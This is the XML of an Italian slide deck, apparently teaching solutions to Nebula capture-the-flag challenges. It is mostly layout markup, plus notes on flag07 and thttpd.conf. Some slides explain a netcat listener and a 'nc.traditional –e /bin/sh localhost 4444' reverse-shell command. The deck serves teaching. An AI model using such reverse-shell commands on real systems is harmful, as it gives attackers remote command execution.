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6" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="343" r:id="rId6"/>
    <p:sldId id="344" r:id="rId7"/>
    <p:sldId id="345" r:id="rId8"/>
    <p:sldId id="399" r:id="rId9"/>
    <p:sldId id="347" r:id="rId10"/>
    <p:sldId id="350" r:id="rId11"/>
    <p:sldId id="349" r:id="rId12"/>
    <p:sldId id="351" r:id="rId13"/>
    <p:sldId id="352" r:id="rId14"/>
    <p:sldId id="354" r:id="rId15"/>
    <p:sldId id="365" r:id="rId16"/>
    <p:sldId id="370" r:id="rId17"/>
    <p:sldId id="353" r:id="rId18"/>
    <p:sldId id="258" r:id="rId19"/>
    <p:sldId id="356" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="363" r:id="rId22"/>
    <p:sldId id="364" r:id="rId23"/>
    <p:sldId id="268" r:id="rId24"/>
    <p:sldId id="371" r:id="rId25"/>
    <p:sldId id="402" r:id="rId26"/>
    <p:sldId id="403" r:id="rId27"/>
    <p:sldId id="404" r:id="rId28"/>
    <p:sldId id="400" r:id="rId29"/>
    <p:sldId id="368" r:id="rId30"/>
    <p:sldId id="366" r:id="rId31"/>
    <p:sldId id="358" r:id="rId32"/>
    <p:sldId id="360" r:id="rId33"/>
    <p:sldId id="361" r:id="rId34"/>
    <p:sldId id="359" r:id="rId35"/>
    <p:sldId id="369" r:id="rId36"/>
    <p:sldId id="372" r:id="rId37"/>
    <p:sldId id="373" r:id="rId38"/>
    <p:sldId id="374" r:id="rId39"/>
    <p:sldId id="377" r:id="rId40"/>
    <p:sldId id="375" r:id="rId41"/>
    <p:sldId id="376" r:id="rId42"/>
    <p:sldId id="378" r:id="rId43"/>
    <p:sldId id="379" r:id="rId44"/>
    <p:sldId id="380" r:id="rId45"/>
    <p:sldId id="383" r:id="rId46"/>
    <p:sldId id="381" r:id="rId47"/>
    <p:sldId id="384" r:id="rId48"/>
    <p:sldId id="386" r:id="rId49"/>
    <p:sldId id="411" r:id="rId50"/>
    <p:sldId id="387" r:id="rId51"/>
    <p:sldId id="388" r:id="rId52"/>
    <p:sldId id="390" r:id="rId53"/>
    <p:sldId id="391" r:id="rId54"/>
    <p:sldId id="392" r:id="rId55"/>
    <p:sldId id="393" r:id="rId56"/>
    <p:sldId id="394" r:id="rId57"/>
    <p:sldId id="395" r:id="rId58"/>
    <p:sldId id="396" r:id="rId59"/>
    <p:sldId id="397" r:id="rId60"/>
    <p:sldId id="398" r:id="rId61"/>
    <p:sldId id="406" r:id="rId62"/>
    <p:sldId id="407" r:id="rId63"/>
    <p:sldId id="408" r:id="rId64"/>
    <p:sldId id="409" r:id="rId65"/>
    <p:sldId id="410" r:id="rId66"/>
    <p:sldId id="292" r:id="rId67"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Bebas Neue" panose="020B0606020202050201" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId69"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId70"/>
      <p:bold r:id="rId71"/>
      <p:italic r:id="rId72"/>
      <p:boldItalic r:id="rId73"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Livvic" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId74"/>
      <p:bold r:id="rId75"/>
      <p:italic r:id="rId76"/>
      <p:boldItalic r:id="rId77"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId78"/>
      <p:bold r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId80"/>
      <p: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FBE"/>
    <a:srgbClr val="F99AAA"/>
    <a:srgbClr val="5863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2E77256-FABB-4896-BFCF-66152BCF13AE}">
  <a:tblStyle styleId="{72E77256-FABB-4896-BFCF-66152BCF13A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84"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6.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata"/><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font" Target="fonts/font1.fntdata"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.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4.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font12.fntdata"/><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font" Target="fonts/font13.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8.fntdata"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.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61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.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gaefed0262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4" name="Google Shape;1254;gaefed0262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78575c1cc5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78575c1cc5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5182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78575c1cc5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78575c1cc5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9040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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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2553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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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59662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78575c1cc5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78575c1cc5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38517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a783214fbb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a783214fb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a783214fbb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a783214fb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70420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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="Google Shape;1845;ga783214fbb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6" name="Google Shape;1846;ga783214fbb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21875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a783214fbb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a783214fb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85678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a783214fbb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a783214fb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153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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3345" name="Google Shape;3345;gdcdb6fa7cc_2_2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6" name="Google Shape;3346;gdcdb6fa7cc_2_2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 SOLUZIONE: in realtà vedremo innanzitutto un primo approccio alla risoluzione della sfida (che è praticamente uguale ad una sfida che abbiamo già fatto, cioè Nebula 07) e successivamente arriveremo alla vera e propria soluzione.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8710793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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1989" name="Google Shape;1989;ga783214fbb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0" name="Google Shape;1990;ga783214fbb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a783214fbb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a783214fb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69074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a783214fbb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a783214fb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90527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a783214fbb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a783214fb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20363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a783214fbb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a783214fb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86840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78575c1cc5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78575c1cc5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23445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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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53992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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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49420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78575c1cc5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78575c1cc5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61804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78575c1cc5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78575c1cc5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7989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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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56441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78575c1cc5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78575c1cc5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29557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78575c1cc5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78575c1cc5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91342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78575c1cc5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78575c1cc5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75830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78575c1cc5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78575c1cc5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57447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78575c1cc5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78575c1cc5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25276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78575c1cc5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78575c1cc5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169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78575c1cc5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78575c1cc5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14807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78575c1cc5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78575c1cc5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19323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78575c1cc5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78575c1cc5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69735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78575c1cc5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78575c1cc5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659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78575c1cc5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78575c1cc5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33618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78575c1cc5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78575c1cc5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50717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78575c1cc5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78575c1cc5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79000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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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18760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78575c1cc5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78575c1cc5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7757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78575c1cc5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78575c1cc5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67344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78575c1cc5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78575c1cc5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74709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78575c1cc5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78575c1cc5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26773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78575c1cc5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78575c1cc5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meglio archiviare i dati nello stato della sessione piuttosto che nasconderli in campo FORM invisibili</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29565900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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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15317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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3316838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78575c1cc5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78575c1cc5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57185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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31887115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78575c1cc5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78575c1cc5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27872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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36483388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78575c1cc5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78575c1cc5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18761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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18620758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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1185672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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11268437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78575c1cc5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78575c1cc5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Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> di sopra è di flag07</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5567090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gdcdb6fa7cc_2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8" name="Google Shape;1838;gdcdb6fa7cc_2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3570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78575c1cc5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78575c1cc5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err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>lk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> 4444:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>	«-l» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ascolta una connessione in entrata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	«-k»  forza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> a rimanere sempre in attesa di un’altra connessione dopo che quella corrente viene completata. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="479421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78575c1cc5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78575c1cc5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1850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78575c1cc5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78575c1cc5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err="1"/>
              <a:t>nc.traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> differisce dal comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>, che abbiamo utilizzato, fino ad ora per un semplice motivo: in quello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>nc.traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> esiste l’opzione «-e» che permette di eseguire programmi da una shell remota.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>In questo caso viene eseguito proprio il programma /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>sh.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Quindi il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>nc.traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> –e /bin/sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> 4444 non fa altro che connettersi a quell’indirizzo ed a quella porta e soltanto dopo eseguirà il programma /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30105862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78575c1cc5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78575c1cc5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89715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78575c1cc5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78575c1cc5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077015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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3716" name="Google Shape;3716;gaf55115641_0_1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7" name="Google Shape;3717;gaf55115641_0_1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78575c1cc5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78575c1cc5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3912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78575c1cc5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78575c1cc5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3282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78575c1cc5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78575c1cc5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2021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068000"/>
            <a:ext cx="3852000" cy="3007500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">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298925" y="3139950"/>
            <a:ext cx="1877700" cy="729900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr sz="15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
  <p:cSld name="CUSTOM_29">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="0"/>
            <a:ext cx="9143996" cy="5023725"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="9143996" cy="5023725"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1113" name="Google Shape;1113;p44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="8559523" y="1128258"/>
              <a:ext cx="584466" cy="3281784"/>
              <a:chOff x="8559523" y="1128258"/>
              <a:chExt cx="584466" cy="3281784"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1114" name="Google Shape;1114;p44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8559523" y="273560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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8623363" y="4301955"/>
                <a:ext cx="60380" cy="108087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3335" h="5970" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2985" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2871" y="0"/>
                      <a:pt x="2763" y="70"/>
                      <a:pt x="2708" y="180"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76" y="5519"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="5669"/>
                      <a:pt x="51" y="5870"/>
                      <a:pt x="201" y="5945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="252" y="5970"/>
                      <a:pt x="302" y="5970"/>
                      <a:pt x="352" y="5970"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="477" y="5970"/>
                      <a:pt x="577" y="5920"/>
                      <a:pt x="627" y="5794"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3259" y="456"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3334" y="306"/>
                      <a:pt x="3259" y="105"/>
                      <a:pt x="3109" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3068" y="10"/>
                      <a:pt x="3026" y="0"/>
                      <a:pt x="2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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9016004" y="2994926"/>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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8736973" y="19643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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9121267" y="3702904"/>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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9034598" y="1818952"/>
                <a:ext cx="22722" cy="22993"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1255" h="1270" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="603" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="446" y="0"/>
                      <a:pt x="295" y="72"/>
                      <a:pt x="176" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="216"/>
                      <a:pt x="126" y="241"/>
                      <a:pt x="101" y="292"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="317"/>
                      <a:pt x="51" y="342"/>
                      <a:pt x="51" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="417"/>
                      <a:pt x="1" y="467"/>
                      <a:pt x="1" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="542"/>
                      <a:pt x="1" y="592"/>
                      <a:pt x="1" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="793"/>
                      <a:pt x="51" y="968"/>
                      <a:pt x="176" y="1069"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="1194"/>
                      <a:pt x="452" y="1269"/>
                      <a:pt x="628" y="1269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="1269"/>
                      <a:pt x="703" y="1244"/>
                      <a:pt x="728" y="1244"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="778" y="1244"/>
                      <a:pt x="828" y="1219"/>
                      <a:pt x="853" y="1219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="903" y="1194"/>
                      <a:pt x="928" y="1169"/>
                      <a:pt x="953" y="1144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1003" y="1119"/>
                      <a:pt x="1029" y="1094"/>
                      <a:pt x="1054" y="1069"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="968"/>
                      <a:pt x="1254" y="793"/>
                      <a:pt x="1254" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1254" y="592"/>
                      <a:pt x="1229" y="542"/>
                      <a:pt x="1229" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="467"/>
                      <a:pt x="1204" y="417"/>
                      <a:pt x="1204" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="342"/>
                      <a:pt x="1154" y="317"/>
                      <a:pt x="1129" y="292"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1104" y="241"/>
                      <a:pt x="1079" y="216"/>
                      <a:pt x="1054" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1029" y="166"/>
                      <a:pt x="1003" y="141"/>
                      <a:pt x="953" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="91"/>
                      <a:pt x="903" y="66"/>
                      <a:pt x="853" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="828" y="41"/>
                      <a:pt x="778" y="16"/>
                      <a:pt x="728" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="686" y="5"/>
                      <a:pt x="644" y="0"/>
                      <a:pt x="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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8700096" y="3562403"/>
                <a:ext cx="55383" cy="54007"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3059" h="2983" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2707" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2626" y="0"/>
                      <a:pt x="2544" y="25"/>
                      <a:pt x="2482" y="75"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="126" y="2456"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2582"/>
                      <a:pt x="0" y="2782"/>
                      <a:pt x="126" y="2907"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="2958"/>
                      <a:pt x="251" y="2983"/>
                      <a:pt x="351" y="2983"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="427" y="2983"/>
                      <a:pt x="502" y="2958"/>
                      <a:pt x="552" y="2907"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2933" y="527"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3058" y="401"/>
                      <a:pt x="3058" y="201"/>
                      <a:pt x="2933" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2870" y="25"/>
                      <a:pt x="2789" y="0"/>
                      <a:pt x="2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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8578586" y="13822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4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8996935" y="112825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 name="Google Shape;1123;p44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-7" y="0"/>
              <a:ext cx="1295404" cy="3623066"/>
              <a:chOff x="-7" y="0"/>
